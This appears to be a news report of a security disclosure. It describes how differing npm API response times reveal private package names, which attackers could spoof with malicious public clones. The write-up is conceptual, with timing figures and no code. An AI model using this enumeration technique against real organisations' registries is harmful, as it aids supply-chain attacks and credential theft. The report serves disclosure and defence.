Security researchers at Aqua Security have discovered a new npm timing attack that allows a threat actor to discover the name of private packages in a repository, which could lead to the deployment of malicious clones to trick developers into using them instead. This attack relies on a slight time difference when requesting a non-existent package via the API vs a private package. When requesting a non-existent package name, the average response time for the 404 error to be returned is just 101 milliseconds. However, when requesting a private package, the average response time is 648 milliseconds.
While the timing difference itself isn’t even a whole second, it is a large enough difference to be measurable, which could allow an attacker to map all the private packages that an organization has in their repository. Coupled with data on historical package information, the threat actor could also determine which of these packages used to be public. This could allow an attacker to create public packages that spoof those that are private to steal user credentials and install malware. Ultimately, this could lead to an attacker gaining access to the private repositories themselves with access to modify the packages, which could then lead to further compromise and disrupt the supply chain.